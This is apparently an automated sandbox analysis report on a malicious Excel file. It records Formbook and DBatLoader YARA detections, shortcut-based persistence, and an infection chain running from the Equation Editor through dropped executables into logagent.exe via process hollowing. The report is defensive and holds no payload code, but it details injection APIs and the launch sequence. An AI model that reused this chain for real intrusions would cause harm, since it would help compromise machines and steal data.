Source: 00000007.00000000.571508744.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.571508744.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.632901217.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.632901217.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.633270454.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.633270454.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.566095697.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498790069.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498758895.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000002.613597049.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.613597049.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.566398254.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000E.00000000.595476317.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.595476317.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.565435086.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565008941.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.588386407.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588750010.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588055915.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.499194499.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.588226799.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498986637.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.589349293.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\dxbmjfsE.url, type: DROPPED Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 020C3F92 appears 108 times
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 020C373B appears 238 times
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 0207E2A8 appears 38 times
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 0207DF5C appears 118 times
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 020EF970 appears 81 times
Source: C:\Users\Public\vbc.exe Code function: String function: 042F44F0 appears 56 times
Source: C:\Users\Public\vbc.exe Code function: String function: 004067E4 appears 61 times
Source: C:\Users\Public\vbc.exe Code function: String function: 04305754 appears 40 times
Source: C:\Users\Public\vbc.exe Code function: String function: 004042E4 appears 81 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 03C25754 appears 40 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 004038F8 appears 44 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 004049F0 appears 38 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 03C144F0 appears 56 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 004067E4 appears 122 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 03A35754 appears 40 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 004042E4 appears 162 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 0040E2B4 appears 42 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 0040F5BC appears 44 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 00404308 appears 46 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 03A244F0 appears 56 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_00450FCC NtdllDefWindowProc_A, 4_2_00450FCC
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 4_2_0044629C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00436A08 NtdllDefWindowProc_A,GetCapture, 4_2_00436A08
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 4_2_00451770
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 4_2_00451820
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042BE54 NtdllDefWindowProc_A, 4_2_0042BE54
Source: C:\Users\Public\vbc.exe Code function: 4_2_042FCE34 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 4_2_042FCE34
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_72498680 NtReadFile, 6_2_72498680
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_72498700 NtClose, 6_2_72498700
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_724987B0 NtAllocateVirtualMemory, 6_2_724987B0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_724985D0 NtCreateFile, 6_2_724985D0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_7249867A NtReadFile, 6_2_7249867A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_724987AB NtAllocateVirtualMemory, 6_2_724987AB
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_724985CA NtCreateFile, 6_2_724985CA
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02070048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_02070048
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02070078 NtResumeThread,LdrInitializeThunk, 6_2_02070078
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020700C4 NtCreateFile,LdrInitializeThunk, 6_2_020700C4
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020707AC NtCreateMutant,LdrInitializeThunk, 6_2_020707AC
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_0206FAD0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_0206FAE8
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_0206FB68
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_0206FBB8
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206F900 NtReadFile,LdrInitializeThunk, 6_2_0206F900
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206F9F0 NtClose,LdrInitializeThunk, 6_2_0206F9F0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FEA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_0206FEA0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_0206FED0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FFB4 NtCreateSection,LdrInitializeThunk, 6_2_0206FFB4
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_0206FC60
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FC90 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_0206FC90
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FD8C NtDelayExecution,LdrInitializeThunk, 6_2_0206FD8C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_0206FDC0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02070060 NtQuerySection, 6_2_02070060
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020710D0 NtOpenProcessToken, 6_2_020710D0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0207010C NtOpenDirectoryObject, 6_2_0207010C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02071148 NtOpenThread, 6_2_02071148
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020701D4 NtSetValueKey, 6_2_020701D4
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FA20 NtQueryInformationFile, 6_2_0206FA20
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FA50 NtEnumerateValueKey, 6_2_0206FA50
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FAB8 NtQueryValueKey, 6_2_0206FAB8
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FB50 NtCreateKey, 6_2_0206FB50
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FBE8 NtQueryVirtualMemory, 6_2_0206FBE8
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206F8CC NtWaitForSingleObject, 6_2_0206F8CC
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02071930 NtSetContextThread, 6_2_02071930
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206F938 NtWriteFile, 6_2_0206F938
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FE24 NtWriteVirtualMemory, 6_2_0206FE24
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FF34 NtQueueApcThread, 6_2_0206FF34
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FFFC NtCreateProcessEx, 6_2_0206FFFC
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FC30 NtOpenProcess, 6_2_0206FC30
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02070C40 NtGetContextThread, 6_2_02070C40
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FC48 NtSetInformationFile, 6_2_0206FC48
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FD5C NtEnumerateKey, 6_2_0206FD5C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02071D80 NtSuspendThread, 6_2_02071D80
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00296F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 6_2_00296F06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00296F12 NtQueryInformationProcess, 6_2_00296F12
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00556F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 6_2_00556F06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00556F12 NtQueryInformationProcess, 6_2_00556F12
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00450FCC NtdllDefWindowProc_A, 8_2_00450FCC
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 8_2_0044629C
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00436A08 NtdllDefWindowProc_A,GetCapture, 8_2_00436A08
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 8_2_00451770
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 8_2_00451820
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_0042BE54 NtdllDefWindowProc_A, 8_2_0042BE54
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_03A2CE34 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 8_2_03A2CE34
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00450FCC NtdllDefWindowProc_A, 11_2_00450FCC
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 11_2_0044629C
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00436A08 NtdllDefWindowProc_A,GetCapture, 11_2_00436A08
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 11_2_00451770
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 11_2_00451820
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0042BE54 NtdllDefWindowProc_A, 11_2_0042BE54
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_03C1CE34 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 11_2_03C1CE34
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$4514808437.xlsx Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@16/33@6/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00423F40 GetLastError,FormatMessageA, 4_2_00423F40
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041C8A8 FindResourceA,LoadResource,SizeofResource,LockResource, 4_2_0041C8A8
Source: 4514808437.xlsx ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Esfjmbxd.exe "C:\Users\user\Esfjmbxd.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Esfjmbxd.exe "C:\Users\user\Esfjmbxd.exe"
Source: C:\Users\user\Esfjmbxd.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Users\user\Esfjmbxd.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Esfjmbxd.exe "C:\Users\user\Esfjmbxd.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Esfjmbxd.exe "C:\Users\user\Esfjmbxd.exe" Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREB76.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00408B32 GetDiskFreeSpaceA, 4_2_00408B32
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: logagent.exe, logagent.exe, 00000006.00000002.615134919.0000000002060000.00000040.00000001.sdmp, logagent.exe, 00000006.00000003.526241583.0000000001ED0000.00000004.00000001.sdmp, logagent.exe, 00000006.00000002.617474362.00000000021E0000.00000040.00000001.sdmp, logagent.exe, 00000006.00000003.525081229.00000000006B0000.00000004.00000001.sdmp
Source: Binary string: cmstp.pdb source: logagent.exe, 00000006.00000002.613866471.0000000000844000.00000004.00000020.sdmp, logagent.exe, 00000006.00000002.613071462.00000000001C0000.00000040.00020000.sdmp

Data Obfuscation:

barindex
Yara detected DBatLoader
Source: Yara match File source: 11.3.Esfjmbxd.exe.1da1ef4.278.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3e0c8.115.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d4154c.246.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d4154c.245.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3e0c8.118.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.1ea2094.286.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d1cd68.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.1e8d594.279.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d41324.242.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3e610.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d2d598.277.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d20c38.39.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.1e8d598.277.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3db70.110.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d20eec.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.1e8d734.287.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3db70.107.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3e2fc.123.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d41ef4.278.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d2d734.287.raw.unpack, type: UNPACKEDPE
